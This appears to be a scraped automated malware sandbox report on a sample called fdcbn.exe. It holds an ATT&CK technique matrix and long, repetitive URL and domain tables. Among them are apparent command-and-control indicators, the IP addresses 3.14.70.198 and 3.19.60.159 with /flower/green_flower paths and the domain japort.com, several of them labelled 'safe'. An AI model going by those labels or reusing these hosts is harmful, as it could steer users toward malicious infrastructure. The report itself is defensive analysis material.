Default Accounts	Exploitation for Client Execution43	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	Security Software Discovery21	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion2	Security Account Manager	Virtualization/Sandbox Evasion2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection12	NTDS	Process Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Scripting11	LSA Secrets	Peripheral Device Discovery11	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information1	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery3	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
japort.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0	0%	URL Reputation	safe
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0	0%	URL Reputation	safe
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0	0%	URL Reputation	safe
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0	0%	URL Reputation	safe
http://www.certplus.com/CRL/class3.crl0	0%	URL Reputation	safe
http://www.certplus.com/CRL/class3.crl0	0%	URL Reputation	safe
http://www.certplus.com/CRL/class3.crl0	0%	URL Reputation	safe
http://www.certplus.com/CRL/class3.crl0	0%	URL Reputation	safe
http://ocsp.suscerte.gob.ve0	0%	URL Reputation	safe
http://ocsp.suscerte.gob.ve0	0%	URL Reputation	safe
http://ocsp.suscerte.gob.ve0	0%	URL Reputation	safe
http://ocsp.suscerte.gob.ve0	0%	URL Reputation	safe
http://crl.dhimyotis.com/certignarootca.crl0	0%	URL Reputation	safe
http://crl.dhimyotis.com/certignarootca.crl0	0%	URL Reputation	safe
http://crl.dhimyotis.com/certignarootca.crl0	0%	URL Reputation	safe
http://crl.dhimyotis.com/certignarootca.crl0	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
http://www.chambersign.org1	0%	URL Reputation	safe
http://www.chambersign.org1	0%	URL Reputation	safe
http://www.chambersign.org1	0%	URL Reputation	safe
http://www.chambersign.org1	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0	0%	URL Reputation	safe
http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0	0%	URL Reputation	safe
http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0	0%	URL Reputation	safe
http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0	0%	URL Reputation	safe
http://crl.ssc.lt/root-c/cacrl.crl0	0%	URL Reputation	safe
http://crl.ssc.lt/root-c/cacrl.crl0	0%	URL Reputation	safe
http://crl.ssc.lt/root-c/cacrl.crl0	0%	URL Reputation	safe
http://crl.ssc.lt/root-c/cacrl.crl0	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
http://ca.disig.sk/ca/crl/ca_disig.crl0	0%	URL Reputation	safe
http://ca.disig.sk/ca/crl/ca_disig.crl0	0%	URL Reputation	safe
http://ca.disig.sk/ca/crl/ca_disig.crl0	0%	URL Reputation	safe
http://ca.disig.sk/ca/crl/ca_disig.crl0	0%	URL Reputation	safe
http://www.suscerte.gob.ve/dpc0	0%	URL Reputation	safe
http://www.suscerte.gob.ve/dpc0	0%	URL Reputation	safe
http://www.suscerte.gob.ve/dpc0	0%	URL Reputation	safe
http://www.suscerte.gob.ve/dpc0	0%	URL Reputation	safe
http://www.disig.sk/ca/crl/ca_disig.crl0	0%	URL Reputation	safe
http://www.disig.sk/ca/crl/ca_disig.crl0	0%	URL Reputation	safe
http://www.disig.sk/ca/crl/ca_disig.crl0	0%	URL Reputation	safe
http://www.disig.sk/ca/crl/ca_disig.crl0	0%	URL Reputation	safe
https://3.14.70.198/flower/green_flowerj	0%	Avira URL Cloud	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
http://policy.camerfirma.com0	0%	URL Reputation	safe
http://policy.camerfirma.com0	0%	URL Reputation	safe
http://policy.camerfirma.com0	0%	URL Reputation	safe
https://officeci.azurewebsites.net/api/	0%	Avira URL Cloud	safe
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?	0%	URL Reputation	safe
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?	0%	URL Reputation	safe
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://wus2-000.pagecontentsync.	0%	URL Reputation	safe
https://wus2-000.pagecontentsync.	0%	URL Reputation	safe
https://wus2-000.pagecontentsync.	0%	URL Reputation	safe
http://crl.ssc.lt/root-b/cacrl.crl0	0%	URL Reputation	safe
http://crl.ssc.lt/root-b/cacrl.crl0	0%	URL Reputation	safe
http://crl.ssc.lt/root-b/cacrl.crl0	0%	URL Reputation	safe
http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G	0%	URL Reputation	safe
http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G	0%	URL Reputation	safe
http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G	0%	URL Reputation	safe
https://wwww.certigna.fr/autorites/0m	0%	URL Reputation	safe
https://wwww.certigna.fr/autorites/0m	0%	URL Reputation	safe
https://wwww.certigna.fr/autorites/0m	0%	URL Reputation	safe
http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0	0%	URL Reputation	safe
http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0	0%	URL Reputation	safe
http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
http://www.globaltrust.info0	0%	URL Reputation	safe
http://www.globaltrust.info0	0%	URL Reputation	safe
http://www.globaltrust.info0	0%	URL Reputation	safe
https://3.14.70.198/flower/green_flower~	0%	Avira URL Cloud	safe
http://ac.economia.gob.mx/last.crl0G	0%	URL Reputation	safe
http://ac.economia.gob.mx/last.crl0G	0%	URL Reputation	safe
http://ac.economia.gob.mx/last.crl0G	0%	URL Reputation	safe
http://crl.oces.trust2408.com/oces.crl0	0%	URL Reputation	safe
http://crl.oces.trust2408.com/oces.crl0	0%	URL Reputation	safe
http://crl.oces.trust2408.com/oces.crl0	0%	URL Reputation	safe
https://3.14.70.198/	0%	Avira URL Cloud	safe
http://certs.oaticerts.com/repository/OATICA2.crl	0%	URL Reputation	safe
http://certs.oaticerts.com/repository/OATICA2.crl	0%	URL Reputation	safe
http://certs.oaticerts.com/repository/OATICA2.crl	0%	URL Reputation	safe
http://certs.oati.net/repository/OATICA2.crt0	0%	URL Reputation	safe
http://certs.oati.net/repository/OATICA2.crt0	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
japort.com	50.87.232.245	true	false	0%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.certplus.com/CRL/class3.crl0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://shell.suite.office.com:1443	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
http://ocsp.suscerte.gob.ve0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://autodiscover-s.outlook.com/	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
http://crl.dhimyotis.com/certignarootca.crl0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false		high
https://cdn.entity.	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
http://www.chambersign.org1	fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://rpsticket.partnerservices.getmicrosoftkey.com	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
http://repository.swisssign.com/0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false		high
http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.ssc.lt/root-c/cacrl.crl0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
https://api.aadrm.com/	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ca.disig.sk/ca/crl/ca_disig.crl0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.suscerte.gob.ve/dpc0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.disig.sk/ca/crl/ca_disig.crl0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://3.14.70.198/flower/green_flowerj	fdcbn.exe, 00000003.00000003.404298189.000001DEEECE6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
https://api.microsoftstream.com/api/	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
https://cr.office.com	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
http://pki.registradores.org/normativa/index.htm0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false		high
https://res.getmicrosoftkey.com/api/redemptionevents	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://tasks.office.com	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
http://policy.camerfirma.com0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://officeci.azurewebsites.net/api/	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false	Avira URL Cloud: safe	unknown
http://www.anf.es/es/address-direccion.html	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false		high
https://www.anf.es/address/)1(0&	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false		high
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://store.office.cn/addinstemplate	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://wus2-000.pagecontentsync.	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.ssc.lt/root-b/cacrl.crl0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.certicamara.com/dpc/0Z	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false		high
http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.pki.wellsfargo.com/wsprca.crl0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false		high
https://wwww.certigna.fr/autorites/0m	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
https://www.anf.es/AC/ANFServerCA.crl0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false		high
https://www.odwebp.svc.ms	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.powerbi.com/v1.0/myorg/groups	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
https://web.microsoftstream.com/video/	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
http://www.globaltrust.info0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://graph.windows.net	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
https://3.14.70.198/flower/green_flower~	fdcbn.exe, 00000003.00000003.404298189.000001DEEECE6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://ac.economia.gob.mx/last.crl0G	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false		high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
http://crl.oces.trust2408.com/oces.crl0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://eca.hinet.net/repository0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false		high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
http://weather.service.msn.com/data.aspx	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
https://3.14.70.198/	fdcbn.exe, 00000003.00000003.404298189.000001DEEECE6000.00000004.00000001.sdmp, fdcbn.exe, 00000003.00000002.500266048.000001DEEECE6000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://certs.oaticerts.com/repository/OATICA2.crl	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://certs.oati.net/repository/OATICA2.crt0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.accv.es00	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
https://3.19.60.159/flower/green_flower;	fdcbn.exe, 00000003.00000003.358864794.000001DEEECE6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false		high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
http://html4/loose.dtd	fdcbn.exe, 00000001.00000002.259081379.00000236079B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508856779.000001DEF23E0000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://web.ncdc.gov.sa/crl/nrcaparta1.crl	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.datev.de/zertifikat-policy-int0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false		high
https://clients.config.office.net/user/v1.0/ios	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
https://192.168.0.1/x	fdcbn.exe, 00000003.00000003.358864794.000001DEEECE6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://3.19.60.159/flower/green_flowerj	fdcbn.exe, 00000003.00000003.358864794.000001DEEECE6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://3.19.60.159/flower/green_flowerl	fdcbn.exe, 00000003.00000003.496960236.000001DEEECE6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://3.19.60.159/flower/green_flowerm32	fdcbn.exe, 00000003.00000003.496960236.000001DEEECE6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://3.19.60.159/flower/green_flowern	fdcbn.exe, 00000003.00000002.500144467.000001DEEEC82000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://o365auditrealtimeingestion.manage.office.com	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
https://3.19.60.159/flower/green_flower	fdcbn.exe, 00000003.00000003.497049838.000001DEEECD0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.office365.com/api/v1.0/me/Activities	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
http://www.acabogacia.org0	fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://192.168.0.1/p	fdcbn.exe, 00000003.00000003.358864794.000001DEEECE6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.firmaprofesional.com/cps0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false		high
https://clients.config.office.net/user/v1.0/android/policies	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
https://entitlement.diagnostics.office.com	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
http://.css	fdcbn.exe, 00000001.00000002.259081379.00000236079B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508856779.000001DEF23E0000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://crl.securetrust.com/SGCA.crl0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
http://www.agesic.gub.uy/acrn/acrn.crl0)	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://outlook.office.com/	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
https://storage.live.com/clientlogs/uploadlocation	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
https://%s.pinrules.crt/%sendTraceLogca1.3.6.1.4.1.311.10.8.11.3.6.1.4.1.311.10.11.1.3.6.1.4.1.311.1	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.rcsc.lt/repository0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://web.certicamara.com/marco-legal0Z	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false		high
http://www.quovadisglobal.com/cps0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false		high
http://www.correo.com.uy/correocert/cps.pdf0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://graph.windows.net/	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
https://devnull.onenote.com	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
https://messaging.office.com/	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
http://certs.oaticerts.com/repository/OATICA2.crt08	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://.jpg	fdcbn.exe, 00000001.00000002.259081379.00000236079B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508856779.000001DEF23E0000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
